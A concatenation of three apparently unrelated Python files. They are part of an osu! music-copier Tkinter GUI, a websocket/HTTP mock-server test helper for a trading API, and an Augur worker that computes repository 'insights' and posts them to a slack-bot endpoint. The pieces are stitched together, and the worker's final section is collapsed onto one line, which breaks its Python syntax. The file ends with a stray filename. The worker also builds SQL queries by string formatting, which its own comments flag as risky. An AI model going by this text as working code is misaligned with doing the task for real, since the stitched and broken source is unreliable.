    aboutNameLabel = ttk.Label(aboutFrame, text="osu! Music Copier", font=("", 15))
    aboutVerLabel = ttk.Label(aboutFrame, text="ver.2.0")
    aboutAuthorLabel = ttk.Label(aboutFrame, text="作者: ReNeeter")
    aboutLinkLabel = ttk.Label(
        aboutFrame,
        text="https://github.com/ReNeeter/osu-Music-Copier",
        foreground="#0000EE",
    )
    aboutLinkLabel.bind(
        "<1>",
        openRepository,
    )
    aboutFrame.pack()
    aboutNameLabel.pack(pady=(10, 5))
    aboutVerLabel.pack()
    aboutAuthorLabel.pack()
    aboutLinkLabel.pack(padx=10, pady=(0, 10))


# Show a directory-selection dialog and write the choice into the given entry
def showDirSelect(setEntry):
    selectDir = filedialog.askdirectory()
    if selectDir:
        setEntry.delete(0, "end")
        setEntry.insert(0, selectDir)


# Start the copy in a background thread
def runCopy():
    global copyThread  # FIXME
    copyThread = Thread(
        target=copy,
        args=(
            osuSongsPathEntry.get(),
            copyPathEntry.get(),
            isAddTagCheckButtonChecked.get(),
            isRenameCheckButtonChecked.get(),
            threadQueue,
        ),
    )
    copyThread.daemon = True
    copyThread.start()


# Show the progress dialog
def showProgress():
    global progressDialog  # FIXME
    progressDialog = tkinter.Toplevel(mainRoot)
    progressDialog.protocol("WM_DELETE_WINDOW", lambda: "break")
    progressDialog.grab_set()
    progressDialog.resizable(False, False)
    progressDialog.title("進捗状況")
    progressFrame = ttk.Frame(progressDialog)
    progressNameLabel = ttk.Label(progressFrame, text="進捗状況", font=("", 15))
    global progressConsoleBox  # FIXME
    progressConsoleBox = Text(progressFrame)
    progressConsoleBox.bind("<Key>", lambda e: "break")  # make the console read-only
    progressBar = ttk.Progressbar(progressFrame, mode="indeterminate", length=800)
    progressFrame.pack()
    progressNameLabel.pack(padx=10, pady=10)
    progressConsoleBox.pack()
    progressBar.pack(padx=10, pady=10)
    progressBar.start(15)
    queueThread = Thread(target=getQueue)
    queueThread.daemon = True
    queueThread.start()


# Consume progress messages from the worker queue
def getQueue():
    # NOTE(review): every threadQueue.get() below consumes a *separate* item, so
    # the first message is displayed while a second item is fetched purely as a
    # success/failure flag. This assumes copier_process.copy puts items in exactly
    # that order — confirm against copier_process before changing this sequence.
    progressConsoleBox.insert("end", threadQueue.get() + "\n")
    if not threadQueue.get():
        progressDialog.destroy()
        sys.exit()
    if isAddTagCheckButtonChecked.get():
        progressConsoleBox.insert("end", threadQueue.get() + "\n")
    if isRenameCheckButtonChecked.get():
        progressConsoleBox.insert("end", threadQueue.get() + "\n")
    copyThread.join()
    progressDialog.destroy()


# Set up Tkinter
if platform.system() == "Windows":
    # Avoid blurry rendering on high-DPI Windows displays
    ctypes.windll.shcore.SetProcessDpiAwareness(True)
mainRoot = tkinter.Tk()
mainRoot.resizable(False, False)
mainRoot.title("osu! Music Copier")
mainMenu = tkinter.Menu(mainRoot)
mainMenu.add_command(label="About", command=showAbout)
mainRoot.config(menu=mainMenu)
mainFrame = ttk.Frame(mainRoot)
osuSongsPathLabel = ttk.Label(mainFrame, text="osu!のSongsフォルダのパス")
osuSongsPathEntry = ttk.Entry(mainFrame, width=80)
osuSongsPathBrowseButton = ttk.Button(
    mainFrame, text="参照…", command=lambda: showDirSelect(osuSongsPathEntry)
)
copyPathLabel = ttk.Label(mainFrame, text="音楽ファイルのコピー先のパス")
copyPathEntry = ttk.Entry(mainFrame, width=80)
copyPathBrowseButton = ttk.Button(
    mainFrame, text="参照…", command=lambda: showDirSelect(copyPathEntry)
)
isAddTagCheckButtonChecked = tkinter.BooleanVar(value=True)
isAddTagCheckButton = ttk.Checkbutton(
    mainFrame,
    text="コピー後に譜面から音楽ファイルの情報を読み取りタグ付けする\n(このオプションはコピーした音楽ファイルがID3形式の場合のみ機能します。\n既存のタグは上書きされます。)",
    variable=isAddTagCheckButtonChecked,
)
isRenameCheckButtonChecked = tkinter.BooleanVar(value=True)
isRenameCheckButton = ttk.Checkbutton(
    mainFrame,
    text="コピー後にファイル名を曲名にリネームする",
    variable=isRenameCheckButtonChecked,
)
threadQueue = Queue()
copyStartButton = ttk.Button(
    mainFrame,
    text="コピー",
    command=lambda: [
        runCopy(),
        showProgress(),
    ],
)
mainFrame.pack()
osuSongsPathLabel.grid(row=0, column=0, padx=10, pady=10)
osuSongsPathEntry.grid(row=0, column=1, padx=10, pady=10)
osuSongsPathBrowseButton.grid(row=0, column=2, padx=10, pady=10)
copyPathLabel.grid(row=1, column=0, padx=10, pady=10)
copyPathEntry.grid(row=1, column=1, padx=10, pady=10)
copyPathBrowseButton.grid(row=1, column=2, padx=10, pady=10)
isAddTagCheckButton.grid(row=2, column=0, columnspan=3, padx=10, pady=10)
isRenameCheckButton.grid(row=3, column=0, columnspan=3, padx=10, pady=10)
copyStartButton.grid(row=4, column=0, columnspan=3, padx=10, pady=10)
mainRoot.mainloop()
# ===== file: helper.py =====
#!/usr/bin/env python
# -*- coding: utf-8 -*-

import json
import lzma
import threading
import asyncio

import websockets
from aiohttp import web


class MockInsServer():
    """HTTP mock that serves a fixed instrument-info payload for tests.

    Runs an aiohttp server on its own event loop in a background thread.
    Call close() to shut it down.
    """

    def __init__(self, port):
        self.loop = asyncio.new_event_loop()
        self.port = port
        # BUGFIX: the stop future must exist before the server thread starts,
        # otherwise task_serve() may read self.stop_signal before it is
        # assigned and die with AttributeError (a startup race).
        self.stop_signal = self.loop.create_future()
        self.thread = threading.Thread(target=self._run)
        self.thread.start()

    def close(self):
        """Resolve the stop future on the server loop and join the thread."""
        self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0))
        self.thread.join()

    async def handle(self, request):
        """Return the canned instrument data for any GET path."""
        data = {
            "SHFE.cu1901": {
                "class": "FUTURE",
                "instrument_id": "SHFE.cu1901",
                "exchange_id": "SHFE",
                "ins_id": "cu1901",
                "ins_name": "\u6caa\u94dc1901",
                "volume_multiple": 5,
                "price_tick": 10,
                "price_decs": 0,
                "sort_key": 20,
                "expired": True,
                "py": "ht,hutong,yinjitong",
                "product_id": "cu",
                "product_short_name": "\u6caa\u94dc",
                "delivery_year": 2019,
                "delivery_month": 1,
                "expire_datetime": 1547535600.0,
                "last_price": 46940.0,
                "pre_volume": 0,
                "open_interest": 0,
                "settlement_price": 46880.0,
                "max_market_order_volume": 0,
                "max_limit_order_volume": 500,
                "margin": 16247.0,
                "commission": 11.605,
                "mmsa": 1,
                "trading_time": {
                    "day": [["09:00:00", "10:15:00"], ["10:30:00", "11:30:00"], ["13:30:00", "15:00:00"]],
                    "night": [["21:00:00", "25:00:00"]]
                }
            }
        }
        return web.json_response(data)

    async def task_serve(self):
        """Run the aiohttp site until the stop future is resolved."""
        app = web.Application()
        app.add_routes([web.get('/{tail:.*}', self.handle)])
        runner = web.AppRunner(app)
        await runner.setup()
        site = web.TCPSite(runner, '127.0.0.1', self.port)
        await site.start()
        await self.stop_signal
        await runner.cleanup()

    def _run(self):
        # Thread entry point: bind the private loop to this thread and serve.
        asyncio.set_event_loop(self.loop)
        self.loop.run_until_complete(self.task_serve())


class MockServer():
    """Websocket mock that replays a recorded md/td session from a log script.

    The script file contains log lines of messages sent/received by the api;
    "received" lines are replayed to the client, "sent" lines are asserted
    against what the client actually sends.
    """

    def __init__(self):
        self.loop = asyncio.new_event_loop()
        self.connections = {}
        self.server_md = None
        self.server_td = None
        self.md_port = 5100
        self.td_port = 5200
        self._expecting = {}
        self.stop_signal = self.loop.create_future()

    def close(self):
        # The script must be fully consumed by the time the test closes us.
        assert not self._expecting
        self.loop.call_soon_threadsafe(lambda: self.stop_signal.set_result(0))
        self.thread.join()

    async def _handler_md(self, connection, path):
        """Handle the market-data websocket connection."""
        await self.on_connected("md", connection)
        try:
            while True:
                s = await self.connections["md"].recv()
                pack = json.loads(s)
                await self.on_received("md", pack)
        except websockets.exceptions.ConnectionClosedOK as e:
            assert e.code == 1000

    async def _handler_td(self, connection, path):
        """Handle the trade websocket connection (peek_message is ignored)."""
        await self.on_connected("td", connection)
        while True:
            s = await self.connections["td"].recv()
            pack = json.loads(s)
            if pack["aid"] == "peek_message":
                continue
            await self.on_received("td", pack)

    def run(self, script_file_name):
        """Start serving the given script file in a background thread."""
        self.script_file_name = script_file_name
        self.thread = threading.Thread(target=self._run)
        self.thread.start()

    async def _server(self):
        async with websockets.serve(self._handler_md, "127.0.0.1", self.md_port) as self.server_md:
            async with websockets.serve(self._handler_td, "127.0.0.1", self.td_port) as self.server_td:
                await self.stop_signal

    def _run(self):
        if str.endswith(self.script_file_name, "lzma"):
            self.script_file = lzma.open(self.script_file_name, "rt", encoding="utf-8")
        else:
            # For running test cases while the local script has not yet been
            # compressed into an lzma file
            self.script_file = open(self.script_file_name, "rt", encoding="utf-8")
        asyncio.set_event_loop(self.loop)
        self.loop.run_until_complete(self._server())

    async def _process_script(self):
        """Process one script line at a time, until client input is expected.

        Example line:
        2019-09-09 16:22:40,652 - DEBUG - websocket message sent to wss://openmd.shinnytech.com/t/md/front/mobile: {"aid": "subscribe_quote",
        """
        self._expecting = {}
        for line in self.script_file:
            item = {}
            if "websocket message sent" in line and "peek_message" not in line:
                # "sent" from the api's point of view
                item["type"] = "sent"
            elif "websocket message received" in line:
                # "received" from the api's point of view
                item["type"] = "received"
            else:
                continue
            if "openmd" in line:
                item["source"] = "md"
            elif "opentd" in line:
                item["source"] = "td"
            else:
                raise Exception()
            content_start_pos = line.find("{")
            content = line[content_start_pos:]
            item["content"] = json.loads(content)
            if item["type"] == "sent":
                # Pause replay: wait for the client to send this message.
                self._expecting = item
                break
            elif item["type"] == "received":
                # Replay server-to-client traffic immediately.
                msg = json.dumps(item["content"])
                assert self.connections[item["source"]]
                await self.connections[item["source"]].send(msg)

    async def on_connected(self, source, connection):
        self.connections[source] = connection
        # self._process_script()
        # assert self._expecting["source"] == source
        # assert self._expecting["action"] == "connected"

    async def on_received(self, source, pack):
        if not self._expecting:
            await self._process_script()
        if pack["aid"] != "peek_message":
            assert self._expecting["source"] == source
            assert self._expecting["content"] == pack
            await self._process_script()
# ===== file: worker.py =====
from multiprocessing import Process, Queue
from urllib.parse import urlparse
import requests
import pandas as pd
import sqlalchemy as s
from sqlalchemy.ext.automap import automap_base
from sqlalchemy import MetaData, and_
import statistics, logging, os, json, time
import numpy as np
import scipy.stats
import datetime


def dump_queue(queue):
    """
    Empties all pending items in a queue and returns them in a list.
    """
    result = []
    queue.put("STOP")
    for i in iter(queue.get, 'STOP'):
        result.append(i)
    # time.sleep(.1)
    return result


class InsightWorker:
    """ Worker that collects data from the Github API and stores it in our database
    task: most recent task the broker added to the worker's queue
    child: current process of the queue being ran
    queue: queue of tasks to be fulfilled
    config: holds info like api keys, descriptions, and database connection strings
    """
    def __init__(self, config, task=None):
        self.config = config
        logging.basicConfig(filename='worker_{}.log'.format(self.config['id'].split('.')[len(self.config['id'].split('.')) - 1]), filemode='w', level=logging.INFO)
        logging.info('Worker (PID: {}) initializing...'.format(str(os.getpid())))
        self._task = task
        self._child = None
        self._queue = Queue()
        self.db = None
        self.tool_source = 'Insight Worker'
        self.tool_version = '0.0.2'  # See __init__.py
        self.data_source = 'Augur API'
        self.refresh = True
        self.send_insights = True
        self.finishing_task = False

        logging.info("Worker initializing...")

        specs = {
            "id": self.config['id'],
            "location": self.config['location'],
            "qualifications": [
                {
                    "given": [["git_url"]],
                    "models": ["insights"]
                }
            ],
            "config": [self.config]
        }

        self.metric_results_counter = 0
        self.insight_results_counter = 0

        """
        Connect to GHTorrent

        :param dbstr: The [database string](http://docs.sqlalchemy.org/en/latest/core/engines.html) to connect to the GHTorrent database
        """
        self.DB_STR = 'postgresql://{}:{}@{}:{}/{}'.format(
            self.config['user'], self.config['password'], self.config['host'],
            self.config['port'], self.config['database']
        )

        dbschema = 'augur_data'  # Searches left-to-right
        self.db = s.create_engine(self.DB_STR, poolclass=s.pool.NullPool,
                                  connect_args={'options': '-csearch_path={}'.format(dbschema)})

        helper_schema = 'augur_operations'
        self.helper_db = s.create_engine(self.DB_STR, poolclass=s.pool.NullPool,
                                         connect_args={'options': '-csearch_path={}'.format(helper_schema)})

        # produce our own MetaData object
        metadata = MetaData()
        helper_metadata = MetaData()

        # we can reflect it ourselves from a database, using options
        # such as 'only' to limit what tables we look at...
        metadata.reflect(self.db, only=['chaoss_metric_status', 'repo_insights', 'repo_insights_records'])
        helper_metadata.reflect(self.helper_db, only=['worker_history', 'worker_job'])

        # we can then produce a set of mappings from this MetaData.
        Base = automap_base(metadata=metadata)
        HelperBase = automap_base(metadata=helper_metadata)

        # calling prepare() just sets up mapped classes and relationships.
        Base.prepare()
        HelperBase.prepare()

        # mapped classes are ready
        self.chaoss_metric_status_table = Base.classes['chaoss_metric_status'].__table__
        self.repo_insights_table = Base.classes['repo_insights'].__table__
        self.repo_insights_records_table = Base.classes['repo_insights_records'].__table__

        self.history_table = HelperBase.classes.worker_history.__table__
        self.job_table = HelperBase.classes.worker_job.__table__

        requests.post('http://{}:{}/api/unstable/workers'.format(
            self.config['broker_host'], self.config['broker_port']), json=specs)  # hello message

    def update_config(self, config):
        """ Method to update config and set a default """
        self.config = {
            'database_connection_string': 'psql://{}:5432/augur'.format(self.config['broker_host']),
            "display_name": "",
            "description": "",
            "required": 1,
            "type": "string"
        }
        self.config.update(config)

    @property
    def task(self):
        """ Property that is returned when the worker's current task is referenced """
        return self._task

    @task.setter
    def task(self, value):
        """ entry point for the broker to add a task to the queue
        Adds this task to the queue, and calls method to process queue
        """
        repo_git = value['given']['git_url']

        """ Query all repos """
        # NOTE(review): SQL built via str.format — fine for broker-supplied
        # values but consider bound parameters; confirm inputs are trusted.
        repoUrlSQL = s.sql.text("""
            SELECT repo_id, repo_group_id FROM repo WHERE repo_git = '{}'
        """.format(repo_git))
        rs = pd.read_sql(repoUrlSQL, self.db, params={})
        try:
            self._queue.put({"git_url": repo_git,
                             "repo_id": int(rs.iloc[0]["repo_id"]),
                             "repo_group_id": int(rs.iloc[0]["repo_group_id"]),
                             "job_type": value['job_type']})
        except Exception as e:
            logging.info("that repo is not in our database, {}".format(e))
        if self._queue.empty():
            if 'github.com' in repo_git:
                self._task = value
                self.run()

    def cancel(self):
        """ Delete/cancel current task """
        self._task = None

    def run(self):
        """ Kicks off the processing of the queue if it is not already being processed
        Gets run whenever a new task is added
        """
        logging.info("Running...\n")
        self._child = Process(target=self.collect, args=())
        self._child.start()

    def collect(self):
        """ Function to process each entry in the worker's task queue
        Determines what action to take based off the message type
        """
        while True:
            time.sleep(2)
            if not self._queue.empty():
                message = self._queue.get()
                # else:
                #     break
                self.discover_insights(message)

    def discover_insights(self, entry_info):
        """ Data collection function
        Query the github api for contributors and issues (not yet implemented)
        """
        # Update table of endpoints before we query them all
        logging.info("Discovering insights for task with entry info: {}".format(entry_info))
        self.record_model_process(entry_info, 'insights')

        # Set the endpoints we want to discover insights for
        endpoints = [{'cm_info': "issues-new"}, {'cm_info': "code-changes"},
                     {'cm_info': "code-changes-lines"}, {'cm_info': 'reviews'}]

        """"""
        """ For when we want all endpoints """
        # """ Query all endpoints """
        # endpointSQL = s.sql.text("""
        #     SELECT * FROM chaoss_metric_status WHERE cm_source = 'augur_db'
        #     """)
        # for endpoint in pd.read_sql(endpointSQL, self.db, params={}).to_records():
        #     endpoints.append(endpoint)
        """"""

        # If we are discovering insights for a group vs repo, the base url will change
        if 'repo_group_id' in entry_info and 'repo_id' not in entry_info:
            base_url = 'http://{}:{}/api/unstable/repo-groups/{}/'.format(
                self.config['broker_host'], self.config['broker_port'], entry_info['repo_group_id'])
        else:
            base_url = 'http://{}:{}/api/unstable/repo-groups/9999/repos/{}/'.format(
                self.config['broker_host'], self.config['broker_port'], entry_info['repo_id'])

        # Hit and discover insights for every endpoint we care about
        for endpoint in endpoints:

            # Hit endpoint
            url = base_url + endpoint['cm_info']
            logging.info("Hitting endpoint: " + url + "\n")
            r = requests.get(url=url)
            data = r.json()

            def is_unique_key(key):
                """ Helper method used to find which keys we want to analyze in each data point """
                return 'date' not in key and key != 'repo_group_id' and key != 'repo_id' and key != 'repo_name' and key != 'rg_name'

            # Filter out keys that we do not want to analyze (e.g. repo_id)
            raw_values = {}
            unique_keys = None
            if len(data) > 0:
                try:
                    unique_keys = list(filter(is_unique_key, data[0].keys()))
                except Exception as e:
                    logging.info("Length bigger than 0 but cannot get 0th element? : {}, {}".format(data, e))
            else:
                logging.info("Endpoint with url: {} returned an empty response. Moving on to next endpoint.\n".format(url))
                continue

            # ci after past year insights after 90 days
            # num issues, issue comments, num commits, num pr, comments pr
            logging.info("Found the following unique keys for this endpoint: {}".format(unique_keys))
            date_filtered_data = []
            i = 0
            not_timeseries = False
            for dict in data:
                begin_date = datetime.datetime.now()
                # Subtract 1 year and leap year check
                try:
                    begin_date = begin_date.replace(year=begin_date.year-1)
                except ValueError:
                    begin_date = begin_date.replace(year=begin_date.year-1, day=begin_date.day-1)
                begin_date = begin_date.strftime('%Y-%m-%d')
                try:
                    if dict['date'] > begin_date:
                        date_filtered_data = data[i:]
                        logging.info("data 365 days ago date found: {}, {}".format(dict['date'], begin_date))
                        break
                except:
                    logging.info("Endpoint {} is not a timeseries, moving to next".format(endpoint))
                    not_timeseries = True
                    break
                i += 1
            if not_timeseries:
                continue

            date_found_index = None
            date_found = False
            x = 0
            begin_date = datetime.datetime.now() - datetime.timedelta(days=90)
            for dict in date_filtered_data:
                dict_date = datetime.datetime.strptime(dict['date'], '%Y-%m-%dT%H:%M:%S.%fZ')  # 2018-08-20T00:00:00.000Z
                if dict_date > begin_date and not date_found:
                    date_found = True
                    date_found_index = x
                    logging.info("raw values 90 days ago date found: {}, {}".format(dict['date'], begin_date))
                x += 1
                for key in unique_keys:
                    try:
                        trash = int(dict[key]) * 2 + 1
                        raw_values[key].append(int(dict[key]))
                    except:
                        try:
                            trash = int(dict[key]) * 2 + 1
                            raw_values[key] = [int(dict[key])]
                        except:
                            logging.info("Key: {} is non-numerical, moving to next key.".format(key))

            for key in raw_values.keys():
                if len(raw_values[key]) > 0:
                    confidence = 0.95
                    mean, lower, upper = self.confidence_interval(raw_values[key], confidence=confidence)
                    logging.info("Upper: {}, middle: {}, lower: {}".format(upper, mean, lower))
                    i = 0
                    discovery_index = None
                    insight = False
                    max_difference = 0
                    score = 0

                    date_filtered_raw_values = []
                    date_filtered_raw_values = date_filtered_data[date_found_index:]
                    logging.info("Raw values: {}".format(date_filtered_raw_values))
                    for dict in date_filtered_raw_values:
                        if (dict[key] > upper and dict[key] - upper > max_difference) or (dict[key] < lower and lower - dict[key] > max_difference):
                            logging.info("Band breached at {}. Marking discovery. dict: {}, key: {}, mean: {}".format(i, dict, key, mean))
                            max_difference = max(dict[key] - upper, lower - dict[key])
                            score = abs(dict[key] - mean) / mean * 100
                            insight = True
                            discovery_index = i
                        i += 1

                    if insight and 'date' in data[0]:

                        ### INSIGHT DISCOVERED ###

                        # Check if new insight has a better score than other insights in its place, use result
                        # to determine if we continue in the insertion process (0 for no insertion, 1 for record
                        # insertion, 2 for record and insight data points insertion)
                        instructions = self.clear_insight(entry_info['repo_id'], score, endpoint['cm_info'], key)
                        # self.clear_insight(entry_info['repo_id'], score, endpoint['cm_info'] + ' ({})'.format(key))

                        # Use result from clearing function to determine if we need to insert the record
                        if instructions['record']:

                            # Insert record in records table and send record to slack bot
                            record = {
                                'repo_id': int(entry_info['repo_id']),
                                'ri_metric': endpoint['cm_info'],
                                'ri_field': key,
                                'ri_value': date_filtered_raw_values[discovery_index][key],
                                'ri_date': date_filtered_raw_values[discovery_index]['date'],
                                'ri_score': score,
                                'ri_detection_method': '95% confidence interval',
                                "tool_source": self.tool_source,
                                "tool_version": self.tool_version,
                                "data_source": self.data_source
                            }
                            result = self.db.execute(self.repo_insights_records_table.insert().values(record))
                            logging.info("Primary key inserted into the repo_insights_records table: {}".format(result.inserted_primary_key))
                            self.insight_results_counter += 1

                            # Send insight to Jonah for slack bot
                            self.send_insight(record, abs(date_filtered_raw_values[discovery_index][key] - mean))

                        # Use result from clearing function to determine if we still need to insert the insight
                        if instructions['insight']:

                            j = 0
                            logging.info("Starting j: {}, discovery_index: {}, data: {}".format(j, discovery_index, date_filtered_data[j]))
                            for tuple in date_filtered_raw_values:
                                try:
                                    data_point = {
                                        'repo_id': int(entry_info['repo_id']),
                                        'ri_metric': endpoint['cm_info'],
                                        'ri_field': key,
                                        'ri_value': tuple[key],
                                        'ri_date': tuple['date'],
                                        'ri_fresh': 0 if j < discovery_index else 1,
                                        'ri_score': score,
                                        'ri_detection_method': '95% confidence interval',
                                        "tool_source": self.tool_source,
                                        "tool_version": self.tool_version,
                                        "data_source": self.data_source
                                    }
                                    result = self.db.execute(self.repo_insights_table.insert().values(data_point))
                                    logging.info("Primary key inserted into the repo_insights table: " + str(result.inserted_primary_key))
                                    logging.info("Inserted data point for endpoint: {}\n".format(endpoint['cm_info']))
                                    j += 1
                                    logging.info("incremented j: {}, discovery_index: {}, data: {}".format(j, discovery_index, date_filtered_data[j]))
                                except Exception as e:
                                    logging.info("error occurred while storing datapoint: {}".format(repr(e)))
                                    break
                else:
                    logging.info("Key: {} has empty raw_values, should not have key here".format(key))

        self.register_task_completion(entry_info, "insights")

    def record_model_process(self, entry_info, model):
        # Record the start of a model run in the worker_history table
        task_history = {
            "repo_id": entry_info['repo_id'],
            "worker": self.config['id'],
            "job_model": model,
            "oauth_id": self.config['zombie_id'],
            "timestamp": datetime.datetime.now(),
            "status": "Stopped",
            "total_results": self.insight_results_counter
        }
        if self.finishing_task:
            result = self.helper_db.execute(self.history_table.update().where(
                self.history_table.c.history_id == self.history_id).values(task_history))
        else:
            result = self.helper_db.execute(self.history_table.insert().values(task_history))
            logging.info("Record incomplete history tuple: {}".format(result.inserted_primary_key))
            self.history_id = int(result.inserted_primary_key[0])

    def register_task_completion(self, entry_info, model):
        # Task to send back to broker
        task_completed = {
            'worker_id': self.config['id'],
            'job_type': entry_info['job_type'],
            'repo_id': entry_info['repo_id'],
            'git_url': entry_info['git_url']
        }
        # Add to history table
        task_history = {
            "repo_id": entry_info['repo_id'],
            "worker": self.config['id'],
            "job_model": model,
            "oauth_id": self.config['zombie_id'],
            "timestamp": datetime.datetime.now(),
            "status": "Success",
            "total_results": self.insight_results_counter
        }
        self.helper_db.execute(self.history_table.update().where(
            self.history_table.c.history_id == self.history_id).values(task_history))

        logging.info("Recorded job completion for: " + str(task_completed) + "\n")

        # Update job process table
        updated_job = {
            "since_id_str": entry_info['repo_id'],
            "last_count": self.insight_results_counter,
            "last_run": datetime.datetime.now(),
            "analysis_state": 0
        }
        self.helper_db.execute(self.job_table.update().where(
            self.job_table.c.job_model == model).values(updated_job))
        logging.info("Update job process for model: " + model + "\n")

        # Notify broker of completion
        logging.info("Telling broker we completed task: " + str(task_completed) + "\n\n" +
                     "This task inserted: " + str(self.insight_results_counter) + " tuples.\n\n")
        requests.post('http://{}:{}/api/unstable/completed_task'.format(
            self.config['broker_host'], self.config['broker_port']), json=task_completed)

        # Reset results counter for next task
        self.insight_results_counter = 0

    def send_insight(self, insight, units_from_mean):
        # Forward a freshly discovered insight to the external slack-bot endpoint
        try:
            begin_date = datetime.datetime.now() - datetime.timedelta(days=30)
            dict_date = datetime.datetime.strptime(insight['ri_date'], '%Y-%m-%dT%H:%M:%S.%fZ')  # 2018-08-20T00:00:00.000Z
            logging.info("about to send to jonah")
            if dict_date > begin_date and self.send_insights:
                logging.info("Insight less than 7 days ago date found: {}\n\nSending to Jonah...".format(insight))
                to_send = {
                    'insight': True,
                    'rg_name': insight['rg_name'],
                    'repo_git': insight['repo_git'],
                    'value': insight['ri_value'],
                    'field': insight['ri_field'],
                    'metric': insight['ri_metric'],
                    'units_from_mean': units_from_mean,
                    'detection_method': insight['ri_detection_method']
                }
                requests.post('https://fgrmv7bswc.execute-api.us-east-2.amazonaws.com/dev/insight-event', json=to_send)
        except Exception as e:
            logging.info("sending insight to jonah failed: {}".format(e))

    def clear_insight(self, repo_id, new_score, new_metric, new_field):
        logging.info("Checking if insight slots filled...")

        # Dict that will be returned that instructs the rest of the worker where the insight insertion is
        # needed (determined by if this new insights score is higher than already stored ones)
        insertion_directions = {'record': False, 'insight': False}

        # Query current record for this
        # NOTE(review): SQL built via str.format — parameterize if these values
        # can ever come from untrusted input.
        recordSQL = s.sql.text("""
            SELECT ri_metric, repo_id, ri_score, ri_field
            FROM repo_insights_records
            WHERE repo_id = {}
            AND ri_metric = '{}'
            AND ri_field = '{}'
            ORDER BY ri_score DESC
        """.format(repo_id, new_metric, new_field))
        rec = json.loads(pd.read_sql(recordSQL, self.db, params={}).to_json(orient='records'))
        logging.info("recordsql: {}, \n{}".format(recordSQL, rec))
        # If new score is higher, continue with deletion
        if len(rec) > 0:
            if new_score > rec[0]['ri_score'] or self.refresh:
                insertion_directions['record'] = True
                for record in rec:
                    logging.info("Refresh is on or Insight record found with a greater score than current slot filled for "
                                 "repo {} metric {} new score {}, old score {}".format(repo_id, record['ri_metric'], new_score, record['ri_score']))
                    deleteSQL = """
                        DELETE
                        FROM repo_insights_records I
                        WHERE repo_id = {}
                        AND ri_metric = '{}'
                        AND ri_field = '{}'
                    """.format(record['repo_id'], record['ri_metric'], record['ri_field'])
                    try:
                        result = self.db.execute(deleteSQL)
                    except Exception as e:
                        logging.info("Error occured deleting insight slot: {}".format(e))
        else:
            insertion_directions['record'] = True

        # Query current insights and rank by score
        num_insights_per_repo = 2
insightSQL = s.sql.text(""" SELECT distinct(ri_metric),repo_id, ri_score FROM repo_insights WHERE repo_id = {} ORDER BY ri_score ASC """.format(repo_id)) ins = json.loads(pd.read_sql(insightSQL, self.db, params={}).to_json(orient='records')) logging.info("This repos insights: {}".format(ins)) # Determine if inisghts need to be deleted based on if there are more insights than we want stored, # or if the current insights have a lower score num_insights = len(ins) to_delete = [] for insight in ins: insight['ri_score'] = insight['ri_score'] if insight['ri_score'] else 0.0 logging.info("{}, {}, {}, {}".format(insight['ri_metric'], new_metric, insight['ri_score'], num_insights_per_repo)) if (insight['ri_score'] < new_score and num_insights >= num_insights_per_repo) or num_insights > num_insights_per_repo or (insight['ri_metric'] == new_metric and self.refresh): num_insights -= 1 to_delete.append(insight) logging.info("condition met, new len: {}, insight score: {}, new_score: {}".format(num_insights, insight['ri_score'], new_score)) # After psuedo-deletion, determine if insertion of the new insight is needed if num_insights < num_insights_per_repo: insertion_directions['insight'] = True # Delete all insights marked for deletion for insight in to_delete: logging.info("insight found with a greater score than current slots filled for repo {} new score {}, old score {}".format(repo_id, new_score, insight['ri_score'])) deleteSQL = """ DELETE FROM repo_insights I WHERE repo_id = {} AND ri_metric = '{}' """.format(insight['repo_id'], insight['ri_metric']) try: result = self.db.execute(deleteSQL) except Exception as e: logging.info("Error occured deleting insight slot: {}".format(e)) return insertion_directions def confidence_interval(self, data, timeperiod='week', confidence=.95): """ Method to find high activity issues in the past specified timeperiod """ a = 1.0 * np.array(data) logging.info("np array: {}".format(a)) n = len(a) m, se = np.mean(a), scipy.stats.sem(a) 
logging.info("Mean: {}, standard error: {}".format(m, se)) h = se * scipy.stats.t.ppf((1 + confidence) / 2., n-1) logging.info("H: {}".format(h)) return m, m-h, m+h def update_metrics(self): logging.info("Preparing to update metrics ...\n\n" + "Hitting endpoint: http://{}:{}/api/unstable/metrics/status ...\n".format( self.config['broker_host'],self.config['broker_port'])) r = requests.get(url='http://{}:{}/api/unstable/metrics/status'.format( self.config['broker_host'],self.config['broker_port'])) data = r.json() active_metrics = [metric for metric in data if metric['backend_status'] == 'implemented'] # Duplicate checking ... need_insertion = self.filter_duplicates({'cm_api_endpoint_repo': "endpoint"}, ['chaoss_metric_status'], active_metrics) logging.info("Count of contributors needing insertion: " + str(len(need_insertion)) + "\n") for metric in need_insertion: tuple = { "cm_group": metric['group'], "cm_source": metric['data_source'], "cm_type": metric['metric_type'], "cm_backend_status": metric['backend_status'], "cm_frontend_status": metric['frontend_status'], "cm_defined": True if metric['is_defined'] == 'true' else False, "cm_api_endpoint_repo": metric['endpoint'], "cm_api_endpoint_rg": None, "cm_info": metric['display_name'], "cm_working_group": metric['group'], "cm_info": metric['tag'], "tool_source": self.tool_source, "tool_version": self.tool_version, "data_source": metric['data_source'] } # Commit metric insertion to the chaoss metrics table result = self.db.execute(self.chaoss_metric_status_table.insert().values(tuple)) logging.info("Primary key inserted into the metrics table: " + str(result.inserted_primary_key)) self.metric_results_counter += 1 logging.info("Inserted metric: " + metric['display_name'] + "\n") def filter_duplicates(self, cols, tables, og_data): need_insertion = [] table_str = tables[0] del tables[0] for table in tables: table_str += ", " + table for col in cols.keys(): colSQL = s.sql.text(""" SELECT {} FROM {} """.format(col, 
table_str)) values = pd.read_sql(colSQL, self.db, params={}) for obj in og_data: if values.isin([obj[cols[col]]]).any().any(): logging.info("value of tuple exists: " + str(obj[cols[col]]) + "\n") elif obj not in need_insertion: need_insertion.append(obj) logging.info("While filtering duplicates, we reduced the data size from " + str(len(og_data)) + " to " + str(len(need_insertion)) + "\n") return need_insertion
text_client.py
